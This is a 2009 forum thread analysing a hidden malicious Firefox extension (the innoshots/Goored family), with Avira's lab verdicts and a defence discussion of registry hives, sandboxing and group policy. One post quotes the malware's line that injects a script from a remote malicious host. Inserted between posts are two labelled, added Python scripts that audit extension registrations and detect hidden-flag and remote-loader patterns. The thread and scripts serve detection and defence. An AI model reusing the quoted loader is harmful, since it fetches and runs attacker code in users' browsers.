RESOLVED Strange script tries to run when connection is down

Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

Results finally back from Avira, from the sample I sent them late Friday evening 21 November 2009 (German time):
Avira wrote: Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC00399674.

We received the following archive files:
File ID     Filename                     Size (Byte)  Result
25501323    sample.zip                   26.73 KB     OK

A listing of files contained inside archives alongside their results can be found below:
File ID     Filename                     Size (Byte)  Result
25501324    chrome.manifest              122 Byte     CLEAN
25501325    _cfg.js                      1.97 KB      CLEAN
25501326    overlay.xul                  7.54 KB      MALWARE
25501327    install.rdf                  764 Byte     CLEAN
25501328    live.php                     308 Byte     MALWARE
25501329    path.txt                     197 Byte     CLEAN
25501330    script attempts t...es.txt   288 Byte     CLEAN
25501331    Untitled.tpp                 4.39 KB      CLEAN
10734900    jq.js                        55.91 KB     KNOWN CLEAN

Please find a detailed report concerning each individual sample below:
Filename Result
chrome.manifest CLEAN
The file 'chrome.manifest' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
_cfg.js CLEAN
The file '_cfg.js' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
overlay.xul MALWARE
The file 'overlay.xul' has been determined to be 'MALWARE'. Our analysts named the threat JS/Gord.A.1. The term "JS/" denotes a JavaScript virus. Detection will be added to our virus definition file (VDF) with one of the next updates.

[[[Gee, thanks, guys. It's been out for only a month now -- that we *know* of. --- T.T]]]

Filename Result
install.rdf CLEAN
The file 'install.rdf' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

[[[What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6.) -- T. T.]]]


Filename Result
live.php MALWARE
The file 'live.php' has been determined to be 'MALWARE'. Our analysts named the threat JS/Agent.hpp. The term "JS/" denotes a JavaScript virus. Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result
path.txt CLEAN
The file 'path.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
script attempts t...es.txt CLEAN
The file 'script attempts to access the following files.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
Untitled.tpp CLEAN
The file 'Untitled.tpp' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
jq.js KNOWN CLEAN
The file 'jq.js' has been determined to be 'KNOWN CLEAN'. In particular this means that we could not find any malicious content. Please note that the file is part of ''.

Alternatively you can see the analysis result here:
http://analysis.avira.com/samples/detai ... tid=399674
I'm glad that they figured out what we already figured out, after we, not they, located the files and analyzed them ourselves. And I'm glad they'll be adding it to the detection list "in the next few updates". :roll: Guess if you want something done right.... :roll:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
GµårÐïåñ
Lieutenant Colonel
Posts: 3369
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Strange script tries to run when connection is down

Post by GµårÐïåñ »

Interesting that of all the 6 different AV programs I used (all major industry players) it would only be the Microsoft Security Essentials that detected it immediately as it was downloading. Wow, a month later and they are just NOW going to add it, horrible but at least confirmed.

As for the answer to Sean's question, yes, the matching keys under HKCU and HKLM are executed and parsed side by side. So if it appears in one location on either hive, then it will be counted, used and processed. The HKCU is generally where user-specific settings are kept, but HKLM is generally what is global to all users (system-level hive, if you will), and they are both processed at all times concurrently. It should be noted that in the cases of conflicting rules in the hives that have matching variables, the HKCU (current user hive) will always override UNLESS, a BIG UNLESS, the machine is being controlled by policies pushed either locally or via Active Directory that prevent that and force compliance with system-pushed settings; then HKLM overrides and has authority.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
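As an added illustration of the point above that both hives are consulted (this is example code added here, not code from the thread or from NoScript): Firefox of that era also loaded extensions registered in the registry, under Software\Mozilla\Firefox\Extensions in either HKCU or HKLM, with the extension id as the value name and the install path as the data. The script below reads both hives (and both the 64-bit and the WOW6432Node views) on Windows; its audit() logic, which also runs on captured data, flags registrations that point at user-writable paths or that exist in both hives with different paths, which is the "lightly controlled" HKCU case SeanM worries about. The registry key is the Mozilla-documented one; the protected-directory list and the sample registrations are constructed assumptions.

```python
"""Audit Firefox extension registrations in both registry hives.

Firefox of the 3.x era also loaded extensions registered in the registry
under Software\\Mozilla\\Firefox\\Extensions, in HKEY_CURRENT_USER and in
HKEY_LOCAL_MACHINE: value name = extension id, value data = path to the
unpacked extension or .xpi. Both hives are read, so an audit that looks at
only one of them misses registrations made in the other.
"""
import sys

EXT_KEY = r"Software\Mozilla\Firefox\Extensions"

# Directories a limited user cannot normally write to. Heuristic, constructed
# for this example; extend it for non-default install locations.
PROTECTED_PREFIXES = (r"c:\program files", r"c:\windows")


def _norm(path):
    """Lower-case and backslash-normalise a registry path string for comparison."""
    return path.strip().lower().replace("/", "\\")


def read_registrations():
    """Read {hive: {ext_id: path}} live from the registry (Windows only).

    Both registry views are opened, because a 32-bit Firefox on 64-bit
    Windows registers under the WOW6432Node view of HKLM.
    """
    import winreg  # standard library, present only on Windows
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    views = (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY)
    result = {}
    for name, root in hives.items():
        entries = {}
        for view in views:
            try:
                with winreg.OpenKey(root, EXT_KEY, 0, winreg.KEY_READ | view) as key:
                    for i in range(winreg.QueryInfoKey(key)[1]):
                        value_name, data, _type = winreg.EnumValue(key, i)
                        entries.setdefault(value_name, str(data))
            except OSError:
                continue  # key absent in this hive/view
        result[name] = entries
    return result


def audit(registrations):
    """registrations: {hive: {ext_id: path}} -> list of finding strings.

    Flags (a) registrations whose path lies outside protected directories
    (a user-writable drop location), and (b) ids present in more than one
    hive with different paths, i.e. a user-level registration sitting
    beside or shadowing a machine-level one.
    """
    findings = []
    ids = sorted({ext_id for entries in registrations.values() for ext_id in entries})
    for ext_id in ids:
        hives = [h for h, entries in registrations.items() if ext_id in entries]
        for hive in hives:
            path = registrations[hive][ext_id]
            if not _norm(path).startswith(PROTECTED_PREFIXES):
                findings.append(f"{hive}: {ext_id} -> {path} (user-writable location)")
        paths = {_norm(registrations[h][ext_id]) for h in hives}
        if len(paths) > 1:
            findings.append(f"{ext_id}: registered in {' and '.join(hives)} with different paths")
    return findings


# Constructed sample of what read_registrations() returns; not real data.
SAMPLE_REGISTRATIONS = {
    "HKCU": {"updater@example.invalid":
             r"C:\Documents and Settings\user\Local Settings\Temp\ext"},
    "HKLM": {"vendor-addon@example.invalid": r"C:\Program Files\Vendor\ffext",
             "updater@example.invalid": r"C:\Program Files\Vendor\updater"},
}


def main():
    if sys.platform != "win32":
        print("live registry read needs Windows; auditing the constructed sample instead")
        data = SAMPLE_REGISTRATIONS
    else:
        data = read_registrations()
    for line in audit(data):
        print(line)


if __name__ == "__main__":
    main()
```

Run it as a normal user first and again elevated: a registration visible in HKCU but not HKLM is exactly the user-writable path the policy discussion is about, and the WOW6432Node view matters whenever Firefox is the 32-bit build.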
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

@ SeanM: I'd like to re-emphasize something buried parenthetically in my above posting of the reply from Avira:
Tom T. wrote:What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6.)
So that should reduce the opportunity for *this particular type* of cloaking.

@ computerfreaker: Are you confusing a tin hat with a dunce cap? The "tin hat" figure of speech refers to taking extraordinary protection measures, e.g. against your brain being invaded by alien malware-beams, or, conversely, its contents read, e.g. by Van Eck Phreaking. It's an exaggeration, and sometimes used to kid people who seem *too* paranoid, but in computer safety, there's no such thing as being too paranoid.

So, IIUC, SeanM was just saying that he'd better go into full-lockdown mode, sealing all doors and windows, etc.... expressing his (justified) concern about these vulnerabilities. Fortunately, as noted above, this one mechanism, the "hidden" tag (not a very bright idea in the first place, IMHO), is being removed from some future version of Fx.

p.s. You guys can change the topic back to "Strange Script etc.", vs. "Topic Split", or I'll change it for you. It was just cloning the headline from my post announcing the split of the Windows AV product discussion.

Edit: Changed the two posts, one by SeanM and one by computerfreaker, that had "Topic Split" as the title.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
SeanM
Junior Member
Posts: 44
Joined: Fri Jul 24, 2009 1:42 pm
Location: Upstate, New York USA

Re: Strange script tries to run when connection is down

Post by SeanM »

Apologies if my "tin hat" reference was misinterpreted. Sometimes, humor is an interrupted defense mechanism. As I monitored this very interesting incident, the thought had arisen that malicious code might have been introduced from the Current User registry key(s), an area that is often lightly controlled. As pointed out, with correct policies and permissions, the HKLM keys can be (and should be) protected.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b3) Gecko/20091115 Firefox/3.6b3
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

SeanM wrote:Apologies if my "tin hat" reference was misinterpreted.
I understood it perfectly. I don't think computerfreaker was familiar with the metaphor, that's all.
SeanM wrote:Sometimes, humor is an interrupted defense mechanism.
Sometimes, humor is an *excellent* defense mechanism! :lol: Don't interrupt it -- let it fly! ('Course, on the Net, where there aren't non-verbal cues such as body language, intonation, etc., there might be a need for a smiley. :) ) No worries! :D
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
computerfreaker
Senior Member
Posts: 220
Joined: Wed Sep 16, 2009 10:03 pm
Location: USA

Re: Strange script tries to run when connection is down

Post by computerfreaker »

Tom T. wrote:Results finally back from Avira, from the sample I sent them late Friday evening 21 November 2009 (German time):<snip>
I'm glad that they figured out what we already figured out, after we, not they, located the files and analyzed them ourselves. And I'm glad they'll be adding it to the detection list "in the next few updates". :roll: Guess if you want something done right.... :roll:
Come on, you've got to be kidding. Why does it take this long for anything to happen...
The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?
GµårÐïåñ wrote:Interesting that of all the 6 different AV programs I used (all major industry players) it would only be the Microsoft Security Essentials that detected it immediately as it was downloading. Wow, a month later and they are just NOW going to add it, horrible but at least confirmed.
I know, that's really bad. At least the MS scanner got it... score a (very begrudging) point for MS.
GµårÐïåñ wrote:As for the answer to Sean's question, yes, the matching keys under HKCU and HKLM are executed and parsed side by side. So if it appears in one location on either hive, then it will be counted, used and processed. The HKCU is generally where user-specific settings are kept, but HKLM is generally what is global to all users (system-level hive, if you will), and they are both processed at all times concurrently. It should be noted that in the cases of conflicting rules in the hives that have matching variables, the HKCU (current user hive) will always override UNLESS, a BIG UNLESS, the machine is being controlled by policies pushed either locally or via Active Directory that prevent that and force compliance with system-pushed settings; then HKLM overrides and has authority.
Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.
Tom T. wrote:@ computerfreaker: Are you confusing a tin hat with a dunce cap? The "tin hat" figure of speech refers to taking extraordinary protection measures, e. g. against your brain being invaded by alien malware-beams, or, conversely, its contents read, e. g. by Van Eck Phreaking. It's an exaggeration, and sometimes used to kid people who seem *too* paranoid, but in computer safety, there's no such thing as being too paranoid.

So, IIUC, SeanM Was just saying that he'd better go into full-lockdown mode, sealing all doors and windows, etc.... expressing his (justified) concern about these vulnerabilities. Fortunately, as noted above, this one mechanism, the "hidden" tag (not a very bright idea in the first place, IMHO) is being removed from some future version of Fx.
In my limited experience, someone saying they'll put on a tin hat always follows a controversial post - I've come to equate it with someone putting on an "anti-flame shield", if you will. Apparently that's not correct... my bad. :oops:
Back on topic, it's good that the hidden attribute is being removed from Fx - with 2 or 3 Fx 3.6 betas out the door, does anybody know if that attribute's been removed yet?
Tom T. wrote:p.s. You guys can change the topic back to "Strange Script etc.", vs. "Topic Split", or I'll change it for you. It was just cloning the headline from my post announcing the split of the Windows AV product discussion.

Edit: Changed the two posts, one by SeanM and one by computerfreaker, that had "Topic Split" as the title.
Thanks!
SeanM wrote:Apologies if my "tin hat" reference was misinterpreted. Sometimes, humor is an interrupted defense mechanism. As I monitored this very interesting incident, the thought had arisen that malicious code might have been introduced from the Current User registry key(s), an area that is often lightly controlled. As pointed out, with correct policies and permissions, the HKLM keys can be (and should be) protected.
Yes, HKLM can & should be protected... too bad HKCU can't be locked down in a similar fashion without a LOT of trouble.
SeanM wrote:Apologies if my "tin hat" reference was misinterpreted.
Tom T. wrote:I understood it perfectly. I don't think computerfreaker was familiar with the metaphor, that's all.
As I mentioned above, I was familiar with the phrase - just not with its correct meaning. ;)
SeanM wrote:Sometimes, humor is an interrupted defense mechanism.
Tom T. wrote:Sometimes, humor is an *excellent* defense mechanism! :lol: Don't interrupt it -- let it fly! ('Course, on the Net, where there aren't non-verbal cues such as body language, intonation, etc., there might be a need for a smiley. :) ) No worries! :D
Humor can be an excellent defense mechanism, but I tend to prefer anti-virus apps... :lol:
And yes, smilies are really important in the absence of body language, tone, eye contact or lack thereof, etc... that's why I use so many. ;)
(Although I might have gotten a little too extreme with those... :lol:)

Happy Thanksgiving, guys!
With great power comes great responsibility.
Learn something new every day, and the rest will take care of itself.
Life is a journey, not a destination. Enjoy the trip!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

computerfreaker wrote: Come on, you've got to be kidding. Why does it take this long for anything to happen...
You get what you pay for? :mrgreen: Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they? :P
FWIW, today it did flag the sample on my machine as malware when I opened it.
computerfreaker wrote:The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?
I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.

Code:

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php
Redirecting or fetching malicious scripts from third parties certainly constitutes malware.
computerfreaker wrote:Happy Thanksgiving, guys!
Ditto to all!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
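The two indicators this thread turned up, the <em:hidden>true</em:hidden> flag in install.rdf (Tom T.'s note on the Avira reply above) and the live.php line quoted in this post that builds a script element pointing at a third-party host, can both be checked statically on an extracted extension before anything is installed or submitted to an AV lab. The following is an added example, not code from the thread or from NoScript: the sample file contents and the example.invalid URL are constructed, and the Firefox application id inside the sample manifest is the real one.

```python
"""Static triage of an extracted Firefox extension (install.rdf era).

Flags the two indicators discussed in the thread:
  1. install.rdf declaring em:hidden = true (the add-on is not listed in the
     Add-ons Manager, so the user never sees it);
  2. script/XUL sources that point a <script> element's src at a remote host,
     i.e. a loader that fetches third-party code at run time.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"
MANIFEST = "urn:mozilla:install-manifest"

# A <script> element being built dynamically, and a src assignment to an
# absolute http(s) URL. The closing quote is not required, so a truncated
# line (as quoted in the thread) still matches.
LOADER_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""")
SRC_RE = re.compile(r"""\.src\s*=\s*['"](https?://[^'"\s]+)""")


def parse_install_rdf(text):
    """Return {'id', 'name', 'hidden'} from the install-manifest Description.

    Only the top-level manifest Description is read, so the em:id inside the
    targetApplication block (Firefox's own id) is not mistaken for the add-on
    id. Properties may be child elements or RDF attributes; both are handled.
    """
    root = ET.fromstring(text)
    manifest = next((d for d in root.iter(RDF + "Description")
                     if MANIFEST in (d.get("about"), d.get(RDF + "about"))), None)
    if manifest is None:
        raise ValueError("no install-manifest Description in install.rdf")
    props = {}
    for child in manifest:                      # <em:hidden>true</em:hidden>
        if child.tag.startswith(EM):
            props.setdefault(child.tag[len(EM):], (child.text or "").strip())
    for attr, val in manifest.attrib.items():   # <Description em:hidden="true">
        if attr.startswith(EM):
            props.setdefault(attr[len(EM):], val.strip())
    return {"id": props.get("id"), "name": props.get("name"),
            "hidden": props.get("hidden", "").lower() == "true"}


def find_remote_script_loaders(source):
    """Remote URLs assigned to a script src, plus whether the element is created dynamically."""
    return {"creates_script_element": bool(LOADER_RE.search(source)),
            "remote_srcs": SRC_RE.findall(source)}


SCANNED_SUFFIXES = (".js", ".jsm", ".xul", ".php", ".htm", ".html")


def triage_extension(files):
    """files: {relative name: text content}. Returns a list of finding strings."""
    findings = []
    if "install.rdf" in files:
        info = parse_install_rdf(files["install.rdf"])
        if info["hidden"]:
            findings.append(f"install.rdf: {info['id']} declares em:hidden=true "
                            "(not shown in the Add-ons Manager)")
    for name, text in sorted(files.items()):
        if not name.lower().endswith(SCANNED_SUFFIXES):
            continue
        result = find_remote_script_loaders(text)
        for url in result["remote_srcs"]:
            note = " via dynamically created element" if result["creates_script_element"] else ""
            findings.append(f"{name}: script src points at remote host {url}{note}")
    return findings


def triage_extension_dir(path):
    """Read an unpacked extension directory from disk and triage it."""
    base = Path(path)
    files = {f.relative_to(base).as_posix(): f.read_text(errors="replace")
             for f in base.rglob("*") if f.is_file()}
    return triage_extension(files)


# Constructed sample extension (not the files from the thread).
SAMPLE_FILES = {
    "install.rdf": """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>sample-addon@example.invalid</em:id>
    <em:name>Sample Add-on (constructed)</em:name>
    <em:version>1.0</em:version>
    <em:hidden>true</em:hidden>
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>3.0</em:minVersion>
        <em:maxVersion>3.6.*</em:maxVersion>
      </Description>
    </em:targetApplication>
  </Description>
</RDF>
""",
    "_cfg.js": "var cfg = { enabled: true, interval: 3600 };\n",
    "overlay.xul": """<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
script=document.createElement('script');script.id="t0";script.src="http://example.invalid/feed.php";
document.documentElement.appendChild(script);
</script>
</overlay>
""",
}

if __name__ == "__main__":
    for line in triage_extension(SAMPLE_FILES):
        print(line)
```

Point triage_extension_dir() at the extracted folder (the .xpi is a zip) to get the same findings from disk; a hidden flag together with a remote loader is a strong signal, while a remote loader alone still deserves a look at what host it fetches from.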
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.
At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched. 8-)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
GµårÐïåñ
Lieutenant Colonel
Posts: 3369
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Strange script tries to run when connection is down

Post by GµårÐïåñ »

computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.
Tom T. wrote:At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched. 8-)
I was going to say earlier, either the sandbox or you can set up (if you know how or care to learn) policy-based permissions using local policy on your own profile. Then you can secure it using Windows authentication and that way it will only run when YOU have logged in, executes the policy and voilà, done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force, and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI, but you can always just type: mmc at the command prompt; when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

GµårÐïåñ wrote:I was going to say earlier, either the sandbox or you can set up (if you know how or care to learn) policy-based permissions using local policy on your own profile. Then you can secure it using Windows authentication and that way it will only run when YOU have logged in, executes the policy and voilà, done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force, and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI, but you can always just type: mmc at the command prompt; when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.
Maybe I'm just lazy :lol: , but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.] :mrgreen: ) Cheers!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
GµårÐïåñ
Lieutenant Colonel
Posts: 3369
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: Strange script tries to run when connection is down

Post by GµårÐïåñ »

Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower, more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through Active Directory and need to control a LOT to be compliant with regulations.
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

GµårÐïåñ wrote:.... Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through Active Directory and need to control a LOT to be compliant with regulations.
Understood, and thanks for that enlightenment for corporate users.

I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
computerfreaker
Senior Member
Posts: 220
Joined: Wed Sep 16, 2009 10:03 pm
Location: USA

Re: Strange script tries to run when connection is down

Post by computerfreaker »

computerfreaker wrote: Come on, you've got to be kidding. Why does it take this long for anything to happen...
Tom T. wrote:You get what you pay for? :mrgreen: Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they? :P
Given this thing was in the wild for close to a month before they did anything, and its relatives (the rest of the Goored family) have been in the wild for months, I'd say the weekend was long over for them. Not a pretty demonstration of AV "mobility"...
Tom T. wrote:FWIW, today it did flag the sample on my machine as malware when I opened it.
That's good...
computerfreaker wrote:The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?
Tom T. wrote:I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.
Nope, I wasn't in that particular loop. I got a couple of messages about the infection, but nothing about live.php...
Tom T. wrote:

Code:

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php
Redirecting or fetching malicious scripts from third parties certainly constitutes malware.
I saw that in live.php, but didn't think of it as malware.... however, you're right about fetching malicious scripts.
btw, just tried manually loading that feed.php - nothing. I'm guessing I borked up the parameters I passed it... I'm not too sorry about the loading failure, though - I don't feel particularly inclined to load a live piece of malware and see what happens, even though NS is protecting me.
computerfreaker wrote:Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.
Tom T. wrote:At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched. 8-)
Sure, a sandbox offers some level of protection. But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)
I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd... ;))
GµårÐïåñ wrote:I was going to say earlier, either the sandbox or you can set up (if you know how or care to learn) policy-based permissions using local policy on your own profile. Then you can secure it using Windows authentication and that way it will only run when YOU have logged in, executes the policy and voilà, done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force, and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI, but you can always just type: mmc at the command prompt; when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.
Potent, but complex & somewhat error-prone...
Tom T. wrote:Maybe I'm just lazy :lol: , but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.] :mrgreen: ) Cheers!
Sandboxie is a lot easier, but group policies are far more potent... I reckon it depends on the user's knowledge & level of control over the system.
GµårÐïåñ wrote:Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower, more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through Active Directory and need to control a LOT to be compliant with regulations.
The permissions-overriding thing's bitten me in phpBB3 before - not too hard to fix, but hard to detect in the first place. System permissions are probably even harder to set up...
Tom T. wrote:I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.
I'm not in a corporate environment, so Sandboxie would work just fine for me...
My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com... :)
(It's not actually an official PA.c release, but is as "clean" as one - nothing gets left on the system, AFAICT)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

Post by Tom T. »

computerfreaker wrote:...Sure, a sandbox offers some level of protection. But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)
*Nothing* covers *everything*. Hence the concept of "defense in depth". We'd hope that AV would flag the hacked app, although the confidence level in AV has dropped a good bit via this thread. :cry: But that is what our AV is supposed to be for.

If the add-on came through the Firefox Add-ons HTTPS secure connection, it almost sounds like an inside job (somebody at MZ).

Don't know what that particular malware did, but since NS blocked the innoshot code from running, there's another part of defense in depth. The malware loaded, but couldn't execute -- and NS alerted the user to it. Of course, other types of malware don't depend on scripting or other things detected by NS.
computerfreaker wrote:I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd... ;))
Seems like we're almost back to running a virtual machine.
IE 8 in Protected Mode is said to limit the browser's ability to make system-wide changes, but plenty of harm can be done right inside the browser.
computerfreaker wrote:My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com... :)
That's either an advertisement or a non sequitur. :mrgreen: I'm aware of your personal situation, and that's fine. I do find that installs on the HD run faster, but if your only option is portable, cool. Still doesn't change the fact that one form or another of sandboxing or virtualization can be an important part of "defense in depth". Cheers.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Strange script tries to run when connection is down

